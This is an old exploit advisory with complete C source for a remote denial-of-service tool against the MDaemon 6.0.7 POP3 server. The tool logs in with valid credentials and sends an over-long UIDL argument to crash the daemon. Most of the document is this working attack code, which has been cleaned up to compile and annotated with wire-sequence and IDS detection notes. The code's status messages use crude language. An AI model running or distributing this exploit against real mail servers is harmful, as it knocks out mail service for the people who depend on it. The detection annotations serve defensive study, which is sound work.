Remote denial-of-service exploit for MDaemon v6.0.7 and below that takes advantage of the UIDL bug. The exploit code was tested to run on Redhat8 and FreeBSD 4.7-STABLE. It requires a POP3 account on the vulnerable daemon.
790e1a322fccc231fc267ba7117c1710f124d3cfa7931256bae04b1c005e3278
Hi,
Description: MDaemon 6.0.7 Remote DoS Exploit. Overflows the UIDL bug.
Exploit code tested to run on Redhat8 and FreeBSD 4.7-STABLE.
Requires POP3 account on vulnerable daemon. Sends the overflow string
and crashes MDaemon. http://www.division7.us support@division7.us
Code included and attached d7-mdaemonx.c
START CODE
---snip d7-mdaemonx.c----
/*
* MDaemonX DoS Exploit
* MDaemon is a popular Win32 based, SMTP, POP, IMAP Server
* Crashes MDaemon 6.0.7 < With UIDL Overflow String
* Coded by Division 7 Security Systems
* http://www.division7.us
* pHrail, smurf, elu1d
* support@division7.us
* Tested to work on Redhat8.0 and FreeBSD 4.7-STABLE
* TeKn|CaL j00 were own3d by this, do not DENY!
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define MAXDATASIZE 100 // max number of bytes we can get at once=20
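/*
 * Print the command-line synopsis to stdout.
 *
 * program: the name the tool was invoked as (argv[0]); it is substituted
 *          into the usage line.
 *
 * The listing was pasted from a quoted-printable mail body, where a soft
 * line break ("=" at end of line) split the fourth printf call in two and
 * made the function uncompilable. The call is rejoined here; the message
 * text is unchanged.
 */
void usage(char *program)
{
    printf("[<$>] MDaemon - DOS Attack - Ported for FreeBSD and Linux\n");
    printf("[<$>] Coded by division7\n");
    printf("[<$>] pHrail, smurfy, elu1d\n");
    printf("[<$>] Usage: %s <host> <username> <password> <port>\n", program);
    printf("[<$>] Note: port 110 is default if port is not specified\n");
}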
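/* Read one chunk of the server's reply into buf (MAXDATASIZE bytes) and echo it. */
static void show_reply(int sockfd, char *buf)
{
    int numbytes = (int)recv(sockfd, buf, MAXDATASIZE - 1, 0);

    if (numbytes == -1) {
        perror("recv");
        exit(1);
    }
    buf[numbytes] = '\0';
    printf("Received: %s", buf);
}

/* Send one NUL-terminated command line to the server, failing loudly on error. */
static void send_line(int sockfd, const char *line)
{
    if (write(sockfd, line, strlen(line)) == -1) {
        perror("write");
        exit(1);
    }
}

/*
 * POP3 client that reproduces the MDaemon UIDL crash described in the text
 * accompanying this listing (MDaemon 6.0.7 and below; the page names no
 * fixed release).
 *
 * Usage: <host> <username> <password> [port]   (port defaults to 110)
 *
 * Sequence on the wire, useful when writing a detection or reading logs:
 *   1. TCP connect, read the POP3 banner.
 *   2. USER and PASS in cleartext, one second apart.
 *   3. A single "UIDL" command whose argument is a 32-digit number, far
 *      longer than any plausible message index.
 *   4. The client idles five seconds and closes the socket.
 * The UIDL command is sent only after the login exchange, so the issue is
 * reachable only with valid mailbox credentials; a POP3 log entry or IDS
 * rule keyed on an over-long numeric UIDL argument identifies the attempt.
 *
 * Changes from the listing as posted:
 *   - quoted-printable residue ("=3D", "=20", soft line breaks) decoded so
 *     the file is valid C again;
 *   - USER/PASS lines are built with snprintf and rejected when they do not
 *     fit, instead of sprintf overflowing the 256-byte stack buffers from
 *     argv;
 *   - the port argument is parsed with strtol and range-checked rather than
 *     passed through atoi, and printed with %d (it is an int; %lu was
 *     undefined behaviour);
 *   - write() results are checked;
 *   - the resolved address is verified to be IPv4 before it is copied;
 *   - a racial slur used as a variable name and in the final status message
 *     was removed.
 *
 * Returns 0 after the sequence completes; exits 1 on any setup or I/O error
 * and 0 after printing usage when too few arguments are given.
 */
int main(int argc, char *argv[])
{
    int sockfd, port, n;
    long port_arg;
    char *end;
    size_t i, pass_len;
    char buf[MAXDATASIZE];
    char user[256];
    char pass[256];
    char uidl[256] = "UIDL 11111111111111111111111111111111\n\0";
    struct hostent *he;
    struct sockaddr_in their_addr; /* connector's address information */

    if (argc < 4) {
        usage(argv[0]);
        exit(0);
    }

    /* argv[argc] is always NULL, so this is safe when exactly 3 args were given. */
    if (argv[4] == NULL) {
        port = 110;
    } else {
        errno = 0;
        port_arg = strtol(argv[4], &end, 10);
        if (end == argv[4] || *end != '\0' || errno == ERANGE ||
            port_arg < 1 || port_arg > 65535) {
            usage(argv[0]);
            exit(1);
        }
        port = (int)port_arg;
    }

    /* Build the command lines up front so over-long arguments are refused
     * before any connection is made. */
    n = snprintf(user, sizeof user, "USER %s\n", argv[2]);
    if (n < 0 || (size_t)n >= sizeof user) {
        fprintf(stderr, "username too long\n");
        exit(1);
    }
    n = snprintf(pass, sizeof pass, "PASS %s\n", argv[3]);
    if (n < 0 || (size_t)n >= sizeof pass) {
        fprintf(stderr, "password too long\n");
        exit(1);
    }

    if ((he = gethostbyname(argv[1])) == NULL) { /* get the host info */
        perror("gethostbyname");
        exit(1);
    }
    if (he->h_addrtype != AF_INET || he->h_addr_list[0] == NULL ||
        (size_t)he->h_length > sizeof their_addr.sin_addr) {
        fprintf(stderr, "no IPv4 address for %s\n", argv[1]);
        exit(1);
    }

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("socket");
        exit(1);
    }

    memset(&their_addr, 0, sizeof their_addr);
    their_addr.sin_family = AF_INET;               /* host byte order */
    their_addr.sin_port = htons((unsigned short)port); /* network byte order */
    memcpy(&their_addr.sin_addr, he->h_addr_list[0], (size_t)he->h_length);

    if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof their_addr) == -1) {
        printf("Sorry, cannot connect to %s. Try again...\n", argv[1]);
        exit(1);
    }

    /* Echo the parameters, masking the password with one '*' per character. */
    pass_len = strlen(argv[3]);
    printf("User: %s\n", argv[2]);
    printf("Pass: ");
    for (i = 0; i < pass_len; i++) {
        printf("*");
    }
    printf("\n");
    printf("Host: %s\n", argv[1]);
    printf("Port: %d\n", port);

    show_reply(sockfd, buf);          /* server banner */

    send_line(sockfd, user);
    show_reply(sockfd, buf);
    sleep(1);

    send_line(sockfd, pass);
    show_reply(sockfd, buf);
    sleep(1);

    /* NOTE: the server's reply is only echoed, never inspected, so this
     * message is printed even when the login was answered with an error. */
    printf("Logged In...Now blowing this bitch up...\n");
    send_line(sockfd, uidl);
    printf("Attack complete...sleeping and exiting...\n");

    sleep(5);
    close(sockfd);
    return 0;
}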
---EOF----